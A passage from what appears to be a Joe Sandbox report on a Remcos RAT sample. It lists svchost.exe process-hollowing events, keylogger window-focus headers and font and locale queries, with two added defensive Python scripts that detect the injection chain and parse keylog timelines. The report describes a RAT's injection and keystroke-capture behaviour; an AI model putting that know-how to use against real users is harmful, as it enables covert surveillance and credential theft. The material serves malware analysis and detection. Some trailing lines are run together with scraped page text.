                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
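                The process-creation entries above are the detection input for the "Suspect Svchost Activity" finding: the dropped copy graias.exe in AppData\Roaming starts C:\Windows\SysWOW64\svchost.exe with a bare "svchost.exe" command line, and that svchost.exe then launches Chrome on a go.microsoft.com shim-error link whose parameters name svchost.exe as the process that could not find a .NET runtime. A genuine service host is started by services.exe, carries a "-k <group>" argument and hosts native service DLLs rather than managed code. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; the event field names and the SAMPLE_EVENTS are constructed from the command lines shown here and are an assumption about what a Sysmon Event ID 1 or EDR export provides.

```python
"""Parent/child checks over process-creation events like the ones in this report.

Added example, not Joe Sandbox or Remcos code.  The field names and the
SAMPLE_EVENTS below are constructed from the command lines shown in the
report and are an assumption about what a Sysmon Event ID 1 or EDR export
would carry.
"""
import ntpath
from dataclasses import dataclass

# A real service host is started by services.exe and carries a -k group.
LEGIT_SVCHOST_PARENT = "services.exe"
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """File name of a Windows path, lower-cased ('unknown' stays 'unknown')."""
    return ntpath.basename(path).lower()


def findings(ev: ProcEvent) -> list:
    """Reasons this event matches the injection chain seen in the report."""
    out = []
    child, parent = basename(ev.image), basename(ev.parent_image)
    if child == "svchost.exe":
        if parent != LEGIT_SVCHOST_PARENT:
            out.append(f"svchost.exe spawned by {parent}, not {LEGIT_SVCHOST_PARENT}")
        if " -k " not in f" {ev.command_line} ":
            out.append("svchost.exe started without a -k service group")
    if parent == "svchost.exe" and child in BROWSERS:
        out.append("service host launched a browser")
        if ("SHIM_NOVERSION_FOUND" in ev.command_line
                and "processName=svchost.exe" in ev.command_line):
            out.append(".NET shim error raised inside svchost.exe "
                       "(managed payload running in a native host)")
    return out


def triage(events):
    """(index, findings) for every event that produced at least one finding."""
    return [(i, findings(ev)) for i, ev in enumerate(events) if findings(ev)]


SHIM_URL = ("http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2"
            "&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)"
            "&processName=svchost.exe&platform=0009&osver=7&isServer=0"
            "&shimver=4.0.30319.0")

# Constructed: one benign service host plus the two links of the report's chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
              r"C:\Windows\SysWOW64\svchost.exe",
              "svchost.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\svchost.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
              "--start-maximized --single-argument " + SHIM_URL),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].image, reasons)
```

                On Sysmon the three fields are ParentImage, Image and CommandLine of Event ID 1. The parent and "-k" checks catch the hollowed service host even when the injected payload never trips the shim error; the browser check is the noisy one and is worth keeping only in combination with the other two.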
                Source: logs.dat.11.dr | Binary or memory string: [2025/01/04 12:43:45 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/01/19 21:18:01 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/06/25 13:53:18 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/07/28 05:58:50 Program Manager]
                Source: logs.dat.11.dr | Binary or memory string: [2025/02/14 07:46:02 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/01/04 12:42:41 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/04/19 07:13:42 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/06/04 08:29:04 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/04/02 10:56:16 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/07/17 03:41:29 Program Manager]
                Source: logs.dat.11.dr | Binary or memory string: [2025/01/04 12:42:23 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/03/03 10:43:53 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4169480576.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [2025/05/06 21:27:14 Program Manager]
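                The bracketed strings above are the window-focus headers that the Remcos keylogger writes to logs.dat: a timestamp followed by the title of the foreground window ("Program Manager" is the desktop itself, so these entries record an idle desktop rather than typed input). The parser below is an added example, not code from the report or from Remcos. The header form is taken from the lines shown here; the assumption that the lines between two headers are the keystrokes captured under that window, and the Notepad session in the sample text, are constructed for illustration.

```python
"""Window-focus timeline from Remcos keylogger headers like those in logs.dat.

Added example, not Remcos or Joe Sandbox code.  The header form
"[YYYY/MM/DD HH:MM:SS <window title>]" is what the report shows; treating
the lines between two headers as keystrokes captured under that window,
and the Notepad entry in SAMPLE_LOG, are constructed assumptions.
"""
import re
from datetime import datetime

HEADER = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
TIME_FMT = "%Y/%m/%d %H:%M:%S"


def parse_keylog(text: str) -> list:
    """One record per header: when it was written, which window had focus,
    and the non-empty lines logged before the next header."""
    records = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            records.append({"time": datetime.strptime(m.group(1), TIME_FMT),
                            "window": m.group(2), "keys": []})
        elif records and line.strip():
            records[-1]["keys"].append(line)
    return records


def windows_with_input(records) -> list:
    """Titles under which something was actually typed, in first-seen order."""
    seen = []
    for r in records:
        if r["keys"] and r["window"] not in seen:
            seen.append(r["window"])
    return seen


def span_seconds(records) -> int:
    """Seconds between the earliest and latest header (0 if fewer than two)."""
    if len(records) < 2:
        return 0
    times = sorted(r["time"] for r in records)
    return int((times[-1] - times[0]).total_seconds())


# Constructed: three headers copied from the report (desktop in focus,
# nothing typed) plus one invented Notepad session with two lines of input.
SAMPLE_LOG = """[2025/01/04 12:42:23 Program Manager]
[2025/01/04 12:42:41 Program Manager]
[2025/01/04 12:43:45 Program Manager]
[2025/01/04 12:44:10 Untitled - Notepad]
meeting notes[Enter]
password123[Enter]
"""

if __name__ == "__main__":
    recs = parse_keylog(SAMPLE_LOG)
    print(len(recs), "headers over", span_seconds(recs), "seconds")
    print("input captured under:", windows_with_input(recs))
```

                When triaging a recovered logs.dat, the window titles are usually the fastest way to see which applications and accounts the operator was able to observe; the headers alone, without the keystrokes, already give a timeline of victim activity.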
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00433E1A cpuid 3_2_00433E1A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoW,3_2_004510CA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: EnumSystemLocalesW,3_2_004470BE
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004511F3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoW,3_2_004512FA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004513C7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoW,3_2_004475A7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoA,3_2_0040E679
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00450A8F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: EnumSystemLocalesW,3_2_00450D52
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: EnumSystemLocalesW,3_2_00450D07
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: EnumSystemLocalesW,3_2_00450DED
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00450E7A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Users\user\Desktop\4XYAW8PbZH.exe VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
